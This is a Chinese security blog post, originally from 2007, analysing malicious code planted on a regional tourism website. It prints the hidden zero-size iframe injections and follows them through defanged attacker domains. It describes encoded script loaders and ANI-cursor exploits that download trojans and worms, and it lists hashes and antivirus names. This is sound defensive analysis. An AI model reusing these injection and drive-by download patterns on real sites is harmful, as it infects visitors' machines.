刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等

浅浅的花香味﹌ 2024-02-17 14:02 37阅读 0赞

**endurer** 原创  
2007-06-12 第**1**版

原来那个Viking还在，又加了一个Viking，几个 Trojan 和 和 Worm。

网站首页被植入代码：  
/---  
＜iframe name="tt" src="exobud.htm" width="580" height="25" scrolling="Auto" frameborder="0"＞＜/iframe＞  
＜iframe src=hxxp://www.m\*85\*8\*\*53.com.cn/index.htm width=0 height=0＞＜/iframe＞  
＜iframe src=hxxp://www.m\*85\*8\*\*53.cn/muma/index.htm width=0 height=0＞＜/iframe＞  
＜iframe src=hxxp://w\*.m\*h\*88\*8\*\*8.cn/ad.htm?a width=100 height=0 frameborder=0＞＜/iframe＞  
＜iframe src=hxxp://www.n\*85\*85\*\*3.cn/index.htm width=0 height=0＞＜/iframe＞  
＜iframe src="hxxp://www.cao\*n\*i\*\*\*ma.info/888.html" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src=hxxp://www.m\*85\*8\*\*53.cn/gogo/index.htm width=0 height=0＞＜/iframe＞  
\--/

**exobud.htm** 包含代码：  
/---  
＜iframe src="hxxp://w\*.m\*h\*88\*8\*\*8.cn/ad.htm?a" width="100" height="0"＞＜/iframe＞  
＜iframe src=hxxp://w\*.m\*h\*88\*8\*\*8.cn/ad.htm?a width=100 height=0 frameborder=0＞＜/iframe＞  
\---/

**hxxp://w\*.m\*h\*88\*8\*\*8.cn/ad.htm?a** 包含代码：  
/---  
＜iframe src="hxxp://www.5\*46\*\*0\*w.cn/3721/myhelp.htm" width="50" height="0"＞ ＜/iframe＞  
＜iframe src="hxxp://w\*.m\*h\*88\*8\*\*8.cn/xxx.htm" width="100" height="0"＞ ＜/iframe＞  
＜iframe src="hxxp://www.5\*46\*\*0\*w.cn/sky.htm" width="100" height="0"＞ ＜/iframe＞  
＜iframe src="hxxp://www.5\*46\*\*0\*w.cn/index.htm" width="100" height="0"＞ ＜/iframe＞  
\---/

**hxxp://www.m\*85\*8\*\*53.com.cn/index.htm**　包含代码：  
/---  
＜iframe src="hxxp://www.p\*u\*\*m\*a\*\*163.com/pu/8378692.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.m\*85\*8\*\*53.cn/muma/index.htm** 包含代码：  
/---  
＜iframe src=hxxp://www.87\*\*87\*72.cn/wm/bms4.htm width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.n\*85\*85\*\*3.cn/index.htm** 末包含代码：  
/---  
＜iframe src="hxxp://www.zpx520.com/cs1.htm?id=88394868-6929" width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.cao\*n\*i\*\*\*ma.info/888.html** 包含代码：  
/---  
＜iframe src="hxxp://www.5\*5\*\*5\*y.net/888.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.5\*5\*\*5\*y.net/888.htm** 包含代码：  
/---  
＜iframe src="hxxp://www.d\*eb\*\*a\*e.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.5\*5\*\*5\*y.net/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.q\*q\*8\*\*81.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.52\*\*00\*\*\*1\*8.com/" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.d\*eb\*\*a\*e.cn** 包含代码：  
/---  
＜iframe src="hxxp://www.pu\*m\*a\*164.com/pu/551903.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.pu\*m\*a\*164.com/pu/551903.htm** 包含代码：  
/---  
＜SCRIPT language="Jscript.encode" src=164.js＞＜/script＞  
\---/

**164.js** 内容为eval()执行自定义函数，经3次解密得到原始代码，下载1.exe。

文件说明符 : D:/test/1.exe  
属性 : A---  
语言 : 中文(中国)  
文件版本 : 1.0.0.0  
说明 :  
版权 :  
备注 :  
产品版本 : 1.0.0.0  
产品名称 :  
公司名称 :  
合法商标 :  
内部名称 :  
源文件名 :  
创建时间 : 2007-6-21 12:33:55  
修改时间 : 2007-6-21 12:33:56  
访问时间 : 2007-6-21 0:0:0  
大小 : 95232 字节 93.0 KB  
MD5 : 24785a0619735bfb63a5b7ffa27c7821

Kaspersky 报为 **Worm.Win32.Viking.ls**，瑞星报为 **Worm.Viking.tl**

**hxxp://www.5\*5\*\*5\*y.net/** 包含代码：  
/---  
＜iframe src=hxxp://www.b\*y\*\*i\*p.cn/newdm/new82.htm width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.b\*y\*\*i\*p.cn/newdm/new82.htm** 是JavaScript和VBScript混合代码，输出为VBScript代码，功能是下载 hxxp://x\*xt\*\*vb\*.cn/arp/dd.exe

文件说明符 : D:/test/dd.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-6-21 12:40:27  
修改时间 : 2007-6-21 12:40:28  
访问时间 : 2007-6-21 0:0:0  
大小 : 36352 字节 35.512 KB  
MD5 : 8faba4ed58813539bdf4b2a0c9b1191c

瑞星报为 **Trojan.DL.Mnless.ajs**

**hxxp://www.q\*q\*8\*\*81.cn/** 包含代码：  
/---  
＜iframe src=hxxp://weather\*\*.n\*e\*\*ws.wl\*\*3\*21.cn/7/1.htm width=0 height=0＞＜/iframe＞  
\---/

**hxxp://weather\*\*.n\*e\*\*ws.wl\*\*3\*21.cn/7/1.htm** 包含代码：  
/---  
＜SCRIPT language="Jscript.encode" src=14.js＞＜/script＞  
\---/

**14.js** 内容为eval()执行自定义函数，经2次解密得到原始代码，下载 hxxp://weather\*\*.n\*e\*\*ws.wl\*\*3\*21.cn/0/x.exe

文件说明符 : D:/pe/tools/virus/x.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-6-21 12:43:36  
修改时间 : 2007-6-21 12:43:38  
访问时间 : 2007-6-21 0:0:0  
大小 : 51783 字节 50.583 KB  
MD5 : 2fb4f30dbc4f74f06e9bf977a0187010

**hxxp://www.52\*\*00\*\*\*1\*8.com/** 首部包含代码：  
/---  
＜iframe src="hxxp://www.dz\*y\*\*520.com/cs.htm?id=slsxmt" width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.dz\*y\*\*520.com/cs.htm?id=slsxmt** 包含两段恶意代码。  
1、US-ASCII编码的字符。到 hxxp://purpleendurer.ys168.com 下载 US-ASCII 编码解码器，解码为：  
/---  
＜HTML＞  
＜BODY style='CURSOR: url(hxxp://q\*.z\*p\*\*x5\*20.com/w.js)'＞  
＜/BODY＞  
＜/HTML＞  
\---/  
**hxxp://q\*.z\*p\*\*x5\*20.com/w.js** 利用 ANI 漏洞下载 0.exe

文件说明符 : D:/test/0.exe  
获取文件版本信息大小失败!  
创建时间 : 2007-6-20 12:4:42  
修改时间 : 2007-6-20 12:4:44  
访问时间 : 2007-6-20 0:0:0  
大小 : 22735 字节 22.207 KB  
MD5 : 0866f380b3acb7f4f057780360677571

Kaspersky 报为 **Trojan-PSW.Win32.Delf.qc**

2、代码：  
/---  
＜iframe src="hxxp://q\*.z\*p\*\*x5\*20.com/1.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://q\*.z\*p\*\*x5\*20.com/1.htm** 包含US-ASCII编码的字符。解码为JavaScript代码，下载 0.exe。

**hxxp://www.m\*85\*8\*\*53.cn/gogo/index.htm** 包含代码：  
/---  
＜iframe src="hxxp://5\*5\*5.5\*5\*\*\*5y.net/888.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://5\*5\*5.5\*5\*\*\*5y.net/888.htm** 包含代码：  
/---  
＜iframe src="hxxp://www.tr\*\*e\*q.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.d\*eb\*\*a\*e.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://5\*5\*5.5\*5\*\*\*5y.net/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.q\*q\*8\*\*81.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.1\*\*25\*a\*.cn/" width="0" height="0" frameborder="0"＞＜/iframe＞  
＜iframe src="hxxp://www.m\*\*qd\*\*l\*.com/index.htm" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.5\*46\*\*0\*w.cn/3721/myhelp.htm** 包含代码：  
/---  
＜iframe src="vip1.htm" width="0" height="0" border="0"＞＜/iframe＞  
＜iframe src="vip2.htm" width="0" height="0" border="0"＞＜/iframe＞  
＜iframe src="vip.htm" width="50" height="0" border="0"＞＜/iframe＞  
\---/

**vip1.htm、vip2.htm** 包含 JavaScript代码，下载520.exe。

文件说明符 : D:/pe/tools/virus/520.exe  
获取文件版本信息大小失败!  
创建时间 : 2007-6-20 12:29:14  
修改时间 : 2007-6-20 12:29:16  
访问时间 : 2007-6-20 0:0:0  
大小 : 22566 字节 22.38 KB  
MD5 : 7ee0d5f58c4672da89fb03e3fdf298aa

Kaspersky 报为 **Trojan-Spy.Win32.Delf.uh**

**vip.htm** 包含代码：  
/---  
＜DIV style="CURSOR: url(ah.c)"＞＜/DIV＞  
\---/  
**ah.c** 利用 ANI漏洞下载 520.exe。

**hxxp://w\*.m\*h\*88\*8\*\*8.cn/xxx.htm** 包含代码：  
/---  
＜iframe src=hxxp://www.c\*o\*py\*i\*p.com/ip001\_1.htm width=0 height=0＞＜/iframe＞  
\---/

**hxxp://www.c\*o\*py\*i\*p.com/ip001\_1.htm** 是JavaScript和VBScript混合代码，输出为VBScript代码，下载 do.exe 和 ip001\_1.exe。

文件说明符 : D:/test/do.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-6-21 12:49:20  
修改时间 : 2007-6-21 12:49:22  
访问时间 : 2007-6-21 0:0:0  
大小 : 35840 字节 35.0 KB  
MD5 : ea58fec5580718ce3f4a7f8ee89928c3

Kaspersky 报为 **Trojan-Downloader.Win32.Delf.bjy**，瑞星 报为 **Worm.Win32.Agent.uu**

文件说明符 : D:/test/ip001\_1.exe  
属性 : A---  
获取文件版本信息大小失败!  
创建时间 : 2007-6-21 12:52:4  
修改时间 : 2007-6-21 12:52:6  
访问时间 : 2007-6-21 0:0:0  
大小 : 41984 字节 41.0 KB  
MD5 : e8c9aad9713190fa621a4d729cdb56fd

Kaspersky 报为 **Trojan-Downloader.Win32.Banload.awy**，瑞星 报为 **Trojan.Clicker.Delf.yjd**

**hxxp://www.5\*46\*\*0\*w.cn/sky.htm** 不存在。

**hxxp://www.5\*46\*\*0\*w.cn/index.htm** 包含代码：  
/---  
＜iframe src="hxxp://www.pu\*m\*a\*164.com/pu/709671697.htm?id=56" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://www.pu\*m\*a\*164.com/pu/709671697.htm?id=56**包含代码：  
/---  
＜SCRIPT language="Jscript.encode" src=164.js＞＜/script＞  
\---/

**164.js** 内容为eval()执行自定义函数，经3次解密得到原始代码，下载  
hxxp://www.pu\*m\*a\*164.com/pu/1.exe。

**hxxp://www.m\*\*qd\*\*l\*.com/index.htm** 包含代码：  
/---  
＜iframe src="hxxp://bo\*\*olo\*m.com/ax.htm?7126?37197" width="0" height="0" frameborder="0"＞＜/iframe＞  
\---/

**hxxp://bo\*\*olo\*m.com/ax.htm?7126?37197** 包含代码：  
/---  
SCRIPT language="Jscript.encode" src=un.js＞＜/script＞  
\---/

**un.js**　内容为eval()执行自定义函数，经3次解密得到原始代码，下载　alexa.exe，  
文件名生成函数比较少见：  
/---  
function HJAakes（slKsm1）｛var LhzSWS2 ＝ window［"Math"］［"random"］（）＊slKsm1；return window［"Math"］［"round"］(LhzSWS2)＋'.exe'；  
\}  
\---/

文件说明符 : D:/pe/tools/virus/alexa.exe  
属性 : A---  
语言 : 中文(中国)  
文件版本 : 1.0.0.0  
说明 :  
版权 :  
备注 :  
产品版本 : 1.0.0.0  
产品名称 :  
公司名称 :  
合法商标 :  
内部名称 :  
源文件名 :  
创建时间 : 2007-6-21 13:35:45  
修改时间 : 2007-6-21 13:35:46  
访问时间 : 2007-6-21 0:0:0  
大小 : 95232 字节 93.0 KB  
MD5 : 0b75d7947a9ac806318170a2cd45188a

Kaspersky 报为 **Worm.Win32.Viking.lm**，瑞星 报为 **Worm.Viking.tc**